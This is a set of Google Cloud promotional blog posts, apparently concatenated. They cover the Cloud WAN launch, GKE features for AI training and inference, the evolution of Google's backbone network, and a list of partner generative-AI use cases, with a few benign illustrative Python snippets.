For over 25 years, Google has pushed the boundaries of the network, with innovations that connect billions of users around the world to essential services like Gmail, YouTube, and Search. At the foundation lies Google’s vast backbone network. With 202 points of presence (PoPs), powered by over 2 million miles of fiber, 33 subsea cables, and backed by a 99.99% reliability SLA, Google’s network provides a robust and resilient global platform.
That same planet-scale network infrastructure powers Google Cloud and our Cross-Cloud Network solutions. And today we are announcing that Google’s global network is available for all businesses and governments to use with our new Cloud WAN solution.
Cloud WAN is a fully managed, reliable, and secure enterprise backbone to transform enterprise wide area network (WAN) architectures. It leverages Google’s planet-scale network, which is optimized for application performance. Cloud WAN provides up to 40% faster performance1 compared to the public internet, and up to a 40% savings2 in total cost of ownership (TCO) over a customer-managed WAN solution.
The evolution of the enterprise WAN
Traditionally, enterprises relied heavily on multiprotocol label switching (MPLS) networks for secure and reliable site-to-site connectivity — a high-cost approach. However, the rapid adoption of SaaS and cloud applications necessitated a transformation, leading to the emergence of SD-WAN with direct internet access (DIA), a lower-cost alternative that leveraged the internet. Then, to enhance application performance, enterprises built colocation-based cloud on-ramps, which, while improving latency, introduced complexity and costs. This evolution led to a proliferation of security stacks, with a mix of security service edge (SSE) and self-managed appliances, creating an inconsistent security posture.
Consequently, enterprise connectivity has become inherently complex and difficult to manage, marked by diverse networks with fragmented security, and requiring a constant balancing of reliability, speed, and cost.
The rapid emergence of AI has placed additional demands on enterprise networks. AI-based applications require a highly distributed infrastructure that is often spread across different clouds and on-premises data centers, and need a global network that can scale massively, provide robust security and privacy, and make efficient use of resources, all while remaining cost-effective.
To address these needs, Cloud WAN offers a unified enterprise network solution for securely and reliably connecting across any enterprise site, application and user, while helping to ensure optimal performance and reducing costs.
Cloud WAN enables two key use cases: providing high-performance connectivity between geographically dispersed data centers, and connecting branch and campus environments over our Premium Tier network.
Use case 1: High performance, cross-region connectivity
Large, global customers with extensive data center networks need to be able to move large amounts of data reliably. Cloud WAN offers flexible connectivity options for linking geographically dispersed data centers, providing a modern alternative to traditional solutions that have limited capacity, high cost of operations, and lower reliability.
This use case is enabled by these core capabilities:
Cloud Interconnect provides private and dedicated low-latency connections between Google Cloud regions and on-prem data centers, allowing you to connect your data center to Google Cloud from over 159 locations around the globe.
Cross-Cloud Interconnect enables multicloud connectivity between Google Cloud and other public cloud environments, including AWS, Azure and OCI, and is available in 21 locations.
Now, with Cross-Site Interconnect, we’re enabling dedicated point-to-point layer 2 private connectivity at 10G and 100G, optimized for connecting applications between data centers and designed for enterprises, government agencies, and telecom operators. With Cross-Site Interconnect, Google Cloud becomes the first major cloud provider to offer transparent layer 2 connectivity over its network. Currently in preview in select countries, Cross-Site Interconnect will expand to additional edge locations in the coming year.
Key benefits of Cross-Site Interconnect include:
Enterprise-grade performance: Backed by an SLA, built-in redundancy, and Google’s high-performance global network, Cross-Site Interconnect is a high-bandwidth (10/100G) data center interconnect solution.
Global reach and capacity: Cross-Site Interconnect runs over Google Cloud’s global backbone, a network of over 2 million miles of fiber, with international capacity for trans-Atlantic and trans-Pacific networks.
Optimized for risk and cost: Cross-Site Interconnect leverages redundant fiber infrastructure to dynamically reroute network traffic around physical network and optical-fiber failures, helping to maintain consistent service availability.
Note: Google Cloud additionally supports scalable layer 3 routing solutions with Network Connectivity Center (NCC). Please see the next section for details.
“Having a scalable and reliable global network is critical as we continue to expand our research efforts and host performance sensitive workloads on Google Cloud. We look forward to leveraging the stability and reliability we have seen with Google’s Cloud WAN to meet the growing needs in our hybrid networks.” – Chris Dee, Head of Cloud Platform Engineering, Citadel Securities
Use case 2: Migrate branch and campus networks
Google’s Premium Tier network serves as a powerful cloud on-ramp, helping to securely connect branch offices and campuses to public cloud resources, SaaS applications, and the internet. Cloud WAN is a unified, fully managed solution that extends the performance and reliability of Google’s trusted network directly to enterprises, enabling on-demand, any-to-any connectivity with inherent security and a lower TCO. Furthermore, our open yet tightly integrated ecosystem empowers enterprises with the choice of best-in-class security and network services, fostering flexibility and tailored solutions.
Premium Tier network delivers up to 40% improved performance
The foundation of this performance is Google’s unparalleled backbone network which provides a robust and resilient platform for your applications.
Google’s Premium Tier network service is designed to deliver optimal application performance. It ensures that internet-based traffic targeting Cloud WAN enters and exits Google’s high-performance network at the geographically closest PoP. This minimizes network hops, driving lower latency and a more consistent user experience.
With over 5,700 direct peering connections and reachability to 60K+ autonomous system numbers (ASNs), Google ranks first among cloud providers and 6th in global peering. This extensive peering network helps ensure efficient traffic exchange with other networks, further enhancing application performance.
Our Verified Peering Provider program allows customers to select ISPs for maximum availability. Now open to all ISPs globally, the program provides redundant, diverse connectivity.
Dedicated fiber access, in partnership with Lumen Technologies (available in select locations in 2025), enables last-mile handoff to Cloud WAN from customer-operated locations including data centers, branches, warehouses, and airports.
BT is enabling its Global Fabric network-as-a-service (NaaS) offering to provide direct connectivity to Google Cloud for BT customers using Cloud WAN.
Cloud WAN’s architecture offers flexible options to address modern enterprises’ diverse connectivity requirements. Network Connectivity Center acts as a centralized hub for enterprises to connect their branches using Cloud VPN or their preferred SD-WAN solution, while campuses and data centers can use Cloud Interconnect for high-bandwidth (10G, 100G) links. To further extend the reach and reliability of enterprise networks, site-to-site data transfer with Network Connectivity Center is now available in 20 countries across the globe.
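For a concrete feel of the hub-and-spoke model, here is a minimal sketch using the google-cloud-network-connectivity Python client to enumerate Network Connectivity Center hubs and spokes. The project ID and region are hypothetical placeholders, and this is an illustration rather than a complete Cloud WAN setup.

```python
# Minimal sketch: enumerate Network Connectivity Center hubs and spokes.
# Requires: pip install google-cloud-network-connectivity
from google.cloud import networkconnectivity_v1

client = networkconnectivity_v1.HubServiceClient()
project = "my-project"  # hypothetical project ID

# Hubs are global resources; spokes (VPN tunnels, Interconnect VLAN
# attachments, SD-WAN router appliances) are regional and reference a hub.
for hub in client.list_hubs(parent=f"projects/{project}/locations/global"):
    print("hub:", hub.name)

for spoke in client.list_spokes(parent=f"projects/{project}/locations/us-central1"):
    print("spoke:", spoke.name, "-> hub:", spoke.hub)
```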
“By bridging the edge-cloud gap, Cloud WAN is enhancing our application performance by up to 40%, reducing costs, and providing resilient, scalable support and foundation for our end-to-end digitalization.” – Ralf Huebenthal, Global Head of IT Platforms, Nestlé
By combining these powerful network capabilities, Cloud WAN delivers a significant improvement in application experience, empowering businesses to provide their users with the performance they expect.
Cloud WAN lowers TCO by up to 40%
Compared with a customer-managed WAN solution, Cloud WAN provides up to a 40% savings in TCO2, offering the flexibility of both usage-based and fixed-price options to suit various needs, and significantly driving down fixed, upfront costs. For organizations that perform high-bandwidth internet data transfers, we are extending a fixed-price model for Cloud Interconnect that will be generally available this quarter. Cloud WAN also allows enterprises to consolidate their carrier-neutral facility deployments into fewer cloud regions, reducing costs.
A tightly integrated, open ecosystem for flexibility and choice
Cloud WAN has an open, flexible, and tightly integrated ecosystem, providing enterprises with the tools they need to build robust and adaptable networks. Cloud WAN offers easy integration of network and security services from a broad ISV ecosystem:
Strong SD-WAN partner ecosystem, featuring leading vendors including Cisco, Fortinet, Juniper Networks, Netskope, Velocloud, and others. Enterprises can choose to self-manage or consume managed overlay connectivity with our services partners.
NCC Gateway (preview in Q2), which makes Cloud WAN the first major cloud solution to offer managed integration of security service edge (SSE) for users accessing private and public applications. SSE offerings are available from Broadcom, Menlo Security, and Palo Alto Networks.
You can also extend the benefits of Cloud WAN with partner solutions to build agile, secure, and automated branch networks, facilitating rapid deployment of new branches and services enabled with:
Infoblox Universal DDI modernizes and simplifies branch networks by delivering infrastructure-free, cloud-based Domain Name Service (DNS), Dynamic Host Configuration Protocol (DHCP), and IP Address Management (IPAM). An optional DNS security component protects against phishing and malware, ensuring your users connect safely to critical applications.
Juniper Networks Mist provides AI-driven campus and branch transformation, including comprehensive insight and automation to optimize user experiences. This integration includes cloud-delivered critical network services like Wi-Fi, wired access, SD-WAN, network access control (NAC), indoor location services, and IoT analytics.
Integration with Google Distributed Cloud (GDC) in a connected configuration, extending Google Cloud’s computing benefits to the edge for latency-sensitive applications. GDC is a fully managed platform supporting containerized and VM-based applications, with automated connectivity back to Google Cloud regions using Cloud WAN.
Partner-managed services
Enterprises that already rely on managed service providers for their enterprise backbone needs can continue to work with their preferred partners when migrating to Cloud WAN. And enterprises that want help migrating, deploying, and operating Cloud WAN can engage one of our global system integrator (GSI) partners. At launch, Cloud WAN partners include Accenture, HCLTech, and Wipro, who offer architecture, design, migration, and ongoing management services.
Learn more
Cloud WAN stands to revolutionize how enterprises connect and secure their global infrastructure. Offering simplicity, high performance, a wealth of connectivity and security service choices, not to mention significant cost savings, Cloud WAN lets you focus on innovation and growth in the cloud and beyond.
1. During testing, network latency was more than 40% lower when traffic to a target traveled over the Cross-Cloud Network compared to when traffic to the same target traveled across the public internet.
2. Architecture includes SD-WAN and 3rd-party firewalls, and compares a customer-managed WAN using multi-site colocation facilities to a WAN managed and hosted by Google Cloud.
The age of AI is now. In fact, the global AI infrastructure market is on track to increase to more than $200 billion by 2028.
However, working with massive data, intricate models, and relentless iterations isn’t easy, and adapting to this new era can be daunting. Platform engineering and infrastructure teams that have invested in Kubernetes may wonder: “After years of building expertise in container orchestration to operate production workloads at scale, how do I enable this next generation of AI workloads?”
The good news? You don’t need to start from scratch. You’re well on your way — your Kubernetes skills and investments aren’t just relevant, they’re your AI superpower. Here’s what we’re announcing today:
Cluster Director for GKE, now generally available, lets you deploy and manage large clusters of accelerated VMs with compute, storage, and networking — all operating as a single unit.
GKE Inference Quickstart, now in public preview, simplifies the selection of infrastructure and deployment of AI models, while delivering benchmarked performance characteristics.
GKE Inference Gateway, now in public preview, provides intelligent routing and load balancing for AI inference on GKE.
A new container-optimized compute platform is rolling out on GKE Autopilot today, and in Q3, Autopilot’s compute platform will be made available to standard GKE clusters.
Gemini Cloud Assist Investigations, now in private preview, helps with GKE troubleshooting, decreasing the time it takes to understand the root cause and resolve issues.
In partnership with Anyscale, RayTurbo on GKE will launch later this year to deliver superior GPU/TPU performance, rapid cluster startup, and robust autoscaling.
Read on for more details about these announcements.
Scale your AI workloads with Cluster Director for GKE
As AI models grow in size and demand more machines for compute processing, platform teams need to deliver new architectures to deploy models across multiple hosts and operate massive clusters of GPUs and TPUs as a single unit. Without these capabilities, customers often struggle to complete large training jobs and to deliver the inter-machine performance they need for AI.
To handle these scaling challenges, our supercomputing service, Cluster Director for GKE (formerly Hypercompute Cluster), is now generally available. With Cluster Director for GKE, you can deploy and manage large clusters of accelerated VMs with compute, storage, and networking — all operating as a single unit. It delivers exceptionally high performance and resilience for large distributed workloads by monitoring cluster health and automatically repairing faulty nodes.
One of the best things about Cluster Director for GKE is that you can orchestrate all of this through standard Kubernetes APIs and ecosystem tooling. There are no new platforms — just new capabilities on the platform you already know and love. You can use GKE node labels to:
Report and replace faulty nodes by gracefully evicting workloads from the node and automatically replacing them with spare capacity within your co-located zone (see the sketch after this list).
Manage host maintenance so you can manually start host maintenance from GKE or use maintenance information while scheduling your workloads.
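If you drive node health from your own tooling, the same pattern is reachable through the standard Kubernetes API. Below is an illustrative sketch with the official Kubernetes Python client, assuming a hypothetical health label; the label key is a placeholder, not a documented GKE label, and GKE’s managed repair flow does this for you automatically.

```python
# Illustrative only — GKE's managed repair handles this automatically.
# Shown here: find nodes carrying a (hypothetical) health label and cordon
# them so workloads can drain and reschedule onto spare capacity.
# Requires: pip install kubernetes
from kubernetes import client, config

config.load_kube_config()  # use load_incluster_config() inside a cluster
v1 = client.CoreV1Api()

# Placeholder label selector, not a documented GKE label.
FAULT_SELECTOR = "example.com/node-health=faulty"

for node in v1.list_node(label_selector=FAULT_SELECTOR).items:
    # Cordon: mark the node unschedulable so no new pods land on it.
    v1.patch_node(node.metadata.name, {"spec": {"unschedulable": True}})
    print("cordoned", node.metadata.name)
```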
We are seeing a clear trend in the age of AI: amazing innovation is happening where traditional compute interacts with neural networks — otherwise known as “inference.” Companies operating at the cutting edge of Kubernetes and AI, like LiveX and Moloco, run AI inference on GKE.
Customers and platform teams deploying AI inference on Kubernetes tell us they face two key challenges:
Balancing performance and cost: Tuning accelerators to meet the right performance targets without overprovisioning requires extensive knowledge of Kubernetes, AI models, GPU/TPU accelerators, and specific inferencing metrics like Time To First Token (TTFT).
Model-aware load balancing: With AI models, response length often varies widely from one request to another, so response latency varies widely too. This means traditional load-balancing techniques like round-robin can break down, exacerbating tail latency and underutilizing accelerator resources (the toy simulation below illustrates the effect).
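To see why round-robin degrades under variable response lengths, here is a toy queueing simulation — not the Inference Gateway’s actual algorithm — comparing round-robin with least-outstanding-work routing across identical replicas:

```python
# Toy simulation: heavy-tailed service times stand in for the highly
# variable output lengths of LLM requests. Purely illustrative.
import random

random.seed(0)
N_REPLICAS, N_REQUESTS, ARRIVAL_GAP = 4, 5000, 1.0
service_times = [random.paretovariate(1.5) for _ in range(N_REQUESTS)]

def simulate(pick_replica):
    free_at = [0.0] * N_REPLICAS       # time each replica finishes its queue
    latencies = []
    now = 0.0
    for s in service_times:
        now += ARRIVAL_GAP             # steady request arrivals
        i = pick_replica(free_at, now)
        start = max(now, free_at[i])   # wait if the replica is busy
        free_at[i] = start + s
        latencies.append(free_at[i] - now)  # queueing + service time
    latencies.sort()
    return latencies[int(0.99 * len(latencies))]  # p99 latency

def make_round_robin():
    state = {"i": -1}
    def pick(free_at, now):
        state["i"] = (state["i"] + 1) % len(free_at)
        return state["i"]
    return pick

def least_outstanding(free_at, now):
    # Route to the replica with the least pending work — a stand-in for
    # model-aware signals such as queue depth or KV-cache utilization.
    return min(range(len(free_at)), key=lambda i: free_at[i])

print("p99, round-robin:      ", round(simulate(make_round_robin()), 1))
print("p99, least-outstanding:", round(simulate(least_outstanding), 1))
```

With heavy-tailed service times, routing on outstanding work consistently cuts tail latency relative to round-robin, which is the intuition behind model-aware load balancing.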
To address these challenges, we’re introducing new AI inference capabilities in GKE:
A new GKE Inference Quickstart, now in public preview, lets you pick an AI model and then provides a set of benchmarked profiles to choose from. The profiles include infrastructure configuration, GPU/TPU accelerator configuration, and Kubernetes resources needed to match a set of AI performance characteristics like TTFT.
GKE Inference Gateway, now in public preview, reduces serving costs by up to 30% and tail latency by up to 60%, and increases throughput by up to 40%. Customers get a model-aware gateway optimized for intelligent routing and load balancing, including advanced features for routing to different model versions.
The best solutions to complex problems meet you where you are and point you to what’s next. The combination of GKE Inference Quickstart and GKE Inference Gateway does just that.
Optimize workloads with GKE Autopilot
Optimizing cloud usage and cost savings continues to be a top priority for both Google Cloud and cloud users, with 71% of organizations naming it their top initiative for the year. If you’re running web and API servers, queue processors, CI/CD agents, or other common workloads, you’re likely over-provisioning some resources to make your apps more responsive. GKE customers often request more compute resources than they use, leading to underutilization and unnecessary costs.
In 2021, we launched GKE Autopilot to combat overprovisioning. Autopilot dramatically simplifies Kubernetes cluster operations and enhances resource efficiency. More and more customers, including Toyota and Contextual AI, are turning to Autopilot for critical workloads. In fact, 30% of active GKE clusters created in 2024 were created in Autopilot mode.
Today, we are announcing new performance improvements to GKE Autopilot, including faster pod scheduling, scaling reaction time, and capacity right-sizing — all made possible by unique hardware capabilities only available on Google Cloud. With Autopilot, your cluster capacity is always right-sized, allowing you to serve more traffic with the same resources or existing traffic with fewer resources.
Currently, Autopilot consists of a best-practice cluster configuration and a container-optimized compute platform that automatically right-sizes capacity to match your workloads. Many customers have told us that they want to right-size capacity on their existing clusters without having to use a specific cluster configuration. To help, starting in Q3, Autopilot’s container-optimized compute platform will also be available to standard GKE clusters, without requiring a specific cluster configuration.
Save time with Gemini Cloud Assist
Nothing slows down the pace of innovation like having to diagnose and debug a problem in your application. Gemini Cloud Assist provides AI-powered assistance across the application lifecycle, and we’re unveiling the private preview of Gemini Cloud Assist Investigations, which helps you understand root cause and resolve issues faster.
The best part? It’s all available right from the GKE console, so you can spend less time troubleshooting and more time innovating. Sign up for the private preview to be able to:
Diagnose pod and cluster issues from the GKE console — even across other Google Cloud services such as nodes, IAM, or load balancers.
See observations from logs and errors across multiple GKE services, controllers, pods, and underlying nodes.
Kubernetes is the open infrastructure platform for AI
For organizations looking for a comprehensive machine learning platform, we recommend Vertex AI, a unified AI development platform for building and using generative AI on Google Cloud. With access to Vertex AI Studio, Agent Builder, and over 200 models in Model Garden — plus the ability to call it from GKE — it’s a great option if you’re looking for an easy-to-use solution.
Over the last decade, Kubernetes has earned its spot as the de-facto standard for hosting cloud-native applications and microservices. Today, organizations that need deep control over their infrastructure are once again turning to Kubernetes to build their AI training and inference platforms. In fact, IBM, Meta, NVIDIA, and Spotify all use Kubernetes for their AI/ML workloads.
To make Kubernetes an even better platform for AI, we’re proud to lead and contribute alongside these companies (and more with the Cloud Native Computing Foundation) to create exciting open source innovations:
Built with Intel, NVIDIA, and more, Dynamic Resource Allocation simplifies and automates hardware allocation and scheduling to pods and workloads.
Developed in conjunction with Apple, Red Hat, and others, Kueue and JobSet provide powerful AI training orchestration, streamline job management, and optimize accelerator utilization.
Partnering with DaoCloud, we built LeaderWorkerSet, which enables deployment and management of large, multi-host AI inference models via a Kubernetes-native API.
Empower data scientists and AI/ML engineers with Ray on GKE
Platform teams have historically relied on Kubernetes and GKE to serve the needs of software engineers building microservices and related cloud-native applications. With increased AI usage, these same platform teams now need to serve a new user base: data scientists and AI/ML engineers. However, most data scientists and AI/ML engineers aren’t familiar with Kubernetes and need a simpler, more approachable way of interacting with distributed infrastructure.
To curb the steep learning curve, many organizations turn to Ray, an open-source framework that provides an easy way for AI/ML engineers to develop Python code on their laptops and then scale that same code elastically across a Kubernetes cluster.
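For readers unfamiliar with Ray, the core programming model is small: decorate a Python function, and Ray schedules it across whatever cluster you are connected to. A minimal example follows; the scoring function is a placeholder for real feature extraction or model inference.

```python
# The Ray programming model in miniature: the same code runs on a laptop or
# scales across a cluster (e.g., GKE with KubeRay). Requires: pip install ray
import ray

ray.init()  # connects to a configured cluster, or starts a local one

@ray.remote
def score(batch):
    # Placeholder for real feature extraction or model scoring.
    return sum(batch) / len(batch)

batches = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
futures = [score.remote(b) for b in batches]  # scheduled in parallel
print(ray.get(futures))                       # -> [2.0, 5.0, 8.0]
```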
We’re committed to making Kubernetes the best platform for using Ray, and have been working closely with Anyscale, the creators of Ray, to optimize open-source Ray for Kubernetes. Today, in partnership with Anyscale, we’re announcing RayTurbo on GKE, an optimized version of open-source Ray. RayTurbo delivers 4.5x faster data processing and requires 50% fewer nodes for serving. On GKE, RayTurbo will take advantage of faster GKE startup times, high-performance storage for model weights, TPUs, and better resource efficiency with dynamic nodes and superior pod scalability. RayTurbo on GKE will launch later this year.
Better together: GKE and AI
AI introduces new challenges for platform teams, but we’re confident that the technology and products that you already use — Kubernetes and GKE — can help you tackle them. With the right foundation, platform teams can expand their scope to support data scientists and AI/ML engineers in addition to software engineers.
This confidence is grounded in experience. At Google, we use GKE to power our leading AI services — including Vertex AI — at scale, relying on the same technologies and best practices that we’re sharing with you today.
Ready to start using Kubernetes for the next generation of AI workloads? We look forward to watching you succeed on GKE.
From answering search queries, to streaming YouTube videos, to handling the most demanding cloud workloads, for over 25 years, we’ve been relentlessly pushing the boundaries of network technology, building a global infrastructure that powers Google and Google Cloud for billions of users and enterprise customers globally. We now stand at another pivotal moment, driven by the transformative power of AI, and our network is once again evolving to meet the challenges and opportunities of this new era.
Here’s a look behind the scenes at the evolution of our global network, from enabling the early days of web search, to today, powering demanding AI workloads to bring AI’s benefits to everyone — people and businesses alike.
Our network’s evolution
There have been several fundamental inflection points for the Google network over the last 25 years, leading to three distinct networking eras:
Internet era: Our journey began in the internet era, when we primarily focused on offering our users across the globe a consistently high-quality experience in terms of reliability and latency — whether they were using Search, Maps, or Gmail. Key innovations included the B2 network; Bandwidth Enforcer (BwE); B4, our first fully software-defined backbone; our Orion software-defined network (SDN) controller; and our petabit-scale SDN data-center fabric, Jupiter.
Streaming era: With the advent of YouTube and similar services, streaming video became a significant portion of global internet traffic — a trend that continues even today. We adapted our network to deliver low-jitter and high-quality video around the world through technologies such as Google Global Cache, Espresso, QUIC, and TCP BBR.
Cloud era: The rise of cloud computing demanded greater resiliency, multi-tenancy, and security, which inspired innovations such as Andromeda, gRPC, PSP, and Swift.
Alongside technology innovations, our network footprint had to scale continuously to reach every Google user and customer with a consistent, high-quality experience. Today, this network spans over 2 million miles of lit fiber, including 33 subsea cable investments, with 202 network edge locations and more than 3,000 media content delivery network (CDN) locations across the globe. It connects 42 Google Cloud regions and 127 zones. We are also the most deeply peered cloud service provider network in the world.
AI is driving unprecedented network demands
As Sundar noted in his Google I/O 2024 keynote, we’ve been AI-first in our approach for more than a decade, investing in and innovating at every layer of the stack. From research and products to infrastructure — our global network fuels these AI innovations and brings them to you wherever you are in the world. All 15 of our half-billion-user products — including seven with 2 billion users — are powered by our Gemini model, and all of them rely on the Google global network to bring us closer to our ultimate goal: making AI helpful for everyone. We take this responsibility very seriously.
The AI era presents unique challenges that require a fundamental rethinking of our network architecture from four key perspectives:
The wide area network (WAN) is the new local area network (LAN): In the AI era, we train the largest of our foundation models across multiple campuses and even multiple metros to pool together large numbers of TPUs. The need for scalability has never been this acute, both for Gemini and for our customers building foundation models on Google Cloud infrastructure. Moreover, these ML applications have unique traffic patterns, such as highly bursty elephant flows. Understanding and managing these flows is critical for efficient network performance.
AI demands zero impact from any outages: AI foundation model training, fine-tuning and inferencing are intensive processes that rely on valuable GPU/TPU resources, and a prolonged outage can be very disruptive to them. In other words, network disruptions are simply unacceptable — our customers expect always-on connected network capacity.
A heightened need for security and control: AI models and the data they are trained on must be protected to ensure their integrity. In addition, there are evolving compliance requirements for AI models from different regions and for data in transit.
Operational excellence: From creating site reliability engineering (SRE) principles and leveraging AI/ML innovations in operations, to finding failure root causes using ML, we’re always exploring new ways to deliver excellence in our network operations. Simultaneously, the challenges of costs and complexity associated with linear scaling have pushed us to seek solutions that are efficient and sustainable for our customers.
New network design principles and innovations
To address these challenges, we’ve reimagined our next-generation network from the ground up, establishing four new design principles.
Exponential scalability: Our network needs the ability and agility to handle massive amounts of data and traffic, especially in key regions serving AI traffic. The need for scalability has never been greater. In the AI era, the WAN is the new LAN and the continent is the data center.
Beyond-9s reliability: The industry has traditionally understood reliability in terms of “3 9s,” “4-9s” or “5-9s” of availability. Increasingly, that is simply not enough, as long-tail events, well within the x-9s specifications, matter as much as the average reliability of the network. Our users and customers expect deterministic performance, a limited impact radius for incidents, and proactive and ultra-fast mitigation. We are embarking on a journey to go “beyond 9s.”
Intent-driven programmability: Billions of people use our network. They have unique requirements for security, compliance, resiliency, performance, and efficiency. To address all these requirements, we need a fully intent-driven, highly programmable network.
Autonomous network: Automation and zero-touch have been buzzwords for the last decade. To support the next decade’s demands, we need autonomous networks that can run at scale 24×7 with minimal human intervention.
Guided by these four design principles, we have built our next-generation global network by making foundational networking advancements.
Multi-shard network: We are moving beyond traditional vertical scaling limitations to elastic, horizontal scalability with our multi-shard network architecture. Each network shard is independent and enables horizontal scaling; not only can we scale the network within a shard, but we can scale the number of shards in the network. This allows for swift and substantial WAN bandwidth growth to support AI infrastructure demands. In fact, from 2020 to 2025, our WAN bandwidth grew a whopping 7x.
Multi-shard isolation, region isolation, and protective reroute: Each of our network shards has its own control plane, data plane, and management plane, and operates independently of other shards. This multi-shard isolation enables a high level of resiliency that’s rare for global backbones at our scale; in fact, it parallels the level of resiliency typically achieved via multiple independent global ISPs, without the associated complexity of managing multiple networks. Regional isolation minimizes the impact of failures and limits the impact radius. Protective ReRoute, a transport technique for shortening user-visible outages, glues it all together – it lets hosts promptly detect and route around any network failures within a few seconds. With Protective ReRoute deployed in our network, we have observed up to 93% reduction in cumulative outage minutes.
Fully intent-driven, fine-grained programmability: We’ve built a highly programmable network with SDN controllers, standard APIs, and universal network models such as the Multi-Abstraction-Layer Topology representation, or MALT. This enables fully intent-driven network controls that allow us to tailor our network to specific application needs, and meet the unique needs of our customers. For example, these controls can be used for regulatory compliance and data sovereignty, including control over data in motion.
Autonomous network: Over the last decade, we’ve transformed our network, moving from event-driven to machine-driven to now autonomous operations. This journey is fueled by ML, which provides us with actionable intelligence. Inspired by Google DeepMind’s work with graph neural networks (GNN) for accurate arrival-time predictions in Google Maps, we used GNN to create a digital twin of our network. This twin lets us predict and prevent outages, quickly pinpoint failures and their root causes, and optimize network capacity planning. As a result, we’ve observed failure mitigation times improve from hours to minutes, boosting our network’s efficiency and resilience with minimal human intervention.
A network to unlock the full potential of AI
For cloud customers, Google’s global network offers the capacity, elasticity, and scale to deploy and leverage AI effectively, 24×7 app resilience with a reliable network, security through zero-trust principles, and performance that meets the needs of AI/ML applications. Furthermore, AI-driven efficiencies reduce maintenance toil, enable faster recovery, and improve ROI. And with Cloud WAN, starting today, Google Cloud customers can use Google’s global network to connect their global enterprises. For end users, this translates to expanded global reach, resilient mission-critical applications, zero-trust security to protect their data, and a performant network for power-intensive real-time apps. Taken together, these help ensure a great user experience.
This is a truly exciting time as we continue to push the boundaries of network technology and realize the transformative potential it holds for our customers in the AI era.
To learn more, we invite you to join us at our Google Cloud Next 2025 session, where we’ll share more details and demonstrate how our network continues to uphold Google’s mission and drive our customers’ success in the Gemini era. Keep an eye out for future blogs about the groundbreaking innovations that are powering Google’s next-generation global network.
Like many of you reading this, I fancy myself a builder. I got my first taste of making a computer do something based on code I wrote into a TI-99 console when I was 8 years old and was hooked. In the four decades that have followed, I’ve seen hundreds, maybe even thousands of developers and companies transform as we shifted from the internet to client-server to mobile and to cloud.
I’ve not seen anything quite as transformative quite as fast as what we’re seeing now, helping companies harness AI to transform their software development, business process, information retrieval, and more.
As part of our commitment to offering the most open and innovative generative AI partner ecosystem, we’re lucky enough to work with the most cutting-edge software companies in the world. As we head into Google Cloud Next ‘25 this week, we thought it might be inspiring to showcase the following 34 use cases illustrating how companies are using AI to transform how they work — moving beyond hype and into production. And if you want even more examples, check out our list of hundreds of real-world gen AI use cases we’ve helped build with our customers and partners.
Hope to see you at Next!
AES – Enabling a massive audit process overhaul with accuracy, speed, and scale with gen AI agents built using Vertex AI and Anthropic’s Claude models.
Airwallex – Detecting and managing fraud in real time in a scalable, always-available environment with Vertex AI, GKE, and GitLab.
Allegro – Enabling millions of real-time, personalized conversations with AI-powered omnichannel orchestration with Google Cloud and GrowthLoop.
BrainLogic – Improving digital commerce experiences with Zapia, a uniquely Latin American personal AI assistant, built with Vertex AI and Anthropic’s Claude models.
Bud Financial – Creating new ways of working and new operating models for financial institutions with Vertex AI and Astra DB from DataStax.
Capital Energy – Taking sustainable energy to new heights with secure cloud technologies, AI, and data platforms with Vertex AI and Fortinet.
CERC – Processing millions of credit data forecasts in minutes with near real-time insights and reduced costs with Databricks on Google Cloud.
Copel – Providing real-time insights with a natural language AI agent that interacts directly with SAP ERP using Google Cloud Cortex Framework.
Cox 2M – Reducing time to insights for non-technical users by 88% with natural-language chat and gen AI with Gemini and ThoughtSpot.
Far Eastern New Century – Streamlining cross-border operations with generative AI with Google Cloud VMware Engine and Microfusion.
Flockx – Combating loneliness by connecting individuals with AI Agent communities via their Collaboration Layer built with Google Cloud and Elastic.
HDFC ERGO – Pioneering insurance superapps for India with personalized AI-driven services at scale with Vertex AI, Niveus Solutions, and Lumiq.
Hunkemöller – Building advanced AI solutions and a game-changing customer data platform for an SAP shop with Vertex AI and Devoteam G Cloud.
Israel Antiquities Authority – Preserving the past for future generations with modern research models with Gemini, NetApp, VMware, and CommIT.
LiveX AI – Reducing customer support costs by up to 85% with AI agents trained and served on Google Kubernetes Engine and NVIDIA AI.
L’Oréal – Delivering a flexible and scalable set of declarative generative AI APIs, in 3 months, for secure access to gen AI for all with Gemini and LangChain.
Maqqie – Transforming the future of HR recruitment and driving increased revenue and retention with Vertex AI and Rappit.
Mercari – Dramatically improving the user experience for both buyers and sellers on its ecommerce marketplace with Vertex AI and Weights & Biases.
Naologic – Democratizing access to AI for all companies—regardless of IT expertise—with Gemini, Google Cloud for Startups Cloud Program, and MongoDB.
NotCo – Transforming its operations with Google Cloud AI agents and Google Cloud Cortex Framework with SAP and Eleven Solutions.
Palo Alto Networks – Speeding software development with Vertex AI and Anthropic’s Claude and protecting cybersecurity with NVIDIA and Google Cloud.
Quora – Powering millions of human-like daily interactions through dynamic gen AI chat experiences with Gemini, Vertex AI, and Anthropic’s Claude.
Rapid7 – Improving customer experiences with efficient cybersecurity customer support, at lightning speed, with Gemini and Ask AI.
Replit – Making software creation accessible and efficient for everyone with Gemini and Anthropic’s Claude.
Stax AI – Automating manual processes and transforming massive volumes of trust accounting data in minutes with Google Cloud and MongoDB.
Studiosus Reisen – Embracing the future of travel with real-time customer bookings with Vertex AI, SAP, happtiq, and Solid Cloud.
Sumitomo Rubber Industries – Accelerating software development time and delivering innovative products faster with Gemini and Kyocera.
Suzano – Enhancing cloud-based data sources for sustainable materials management on SAP with Gemini, Google Cloud Cortex Framework, and Sauter.
UDN Group – Improving clickthrough rates, enhancing operational efficiency, and providing highly reliable digital media services with Vertex AI and Merkle.
Vodafone – Providing clear customer insights and actionable decision intelligence with a 360-customer view for improved service experiences with Google Cloud and Quantexa.
Wayfair – Driving AI innovation in e-commerce with curated options that elevate online shopping experiences using Google Cloud and Snorkel.
WealthAPI – Delivering next-gen financial insights in real time to millions of customers for personalized guidance at scale with Gemini and DataStax Astra DB.
Writer – Building and training over 17 large language models (LLMs) that scale up to 70 billion parameters for custom AI models with Google Cloud and NVIDIA.
These partners are driving a wave of generative AI innovation, building next-generation applications and models, and integrating their solutions with powerful Gemini, Vertex AI, and BigQuery features. These advancements are helping customers realize the value of generative AI faster than ever before. Explore more stories to learn how our open partner ecosystem is supporting customer gen AI deployments, and discover how our partners simplify the discovery, procurement, and deployment of groundbreaking generative AI solutions in the Google Cloud Marketplace.
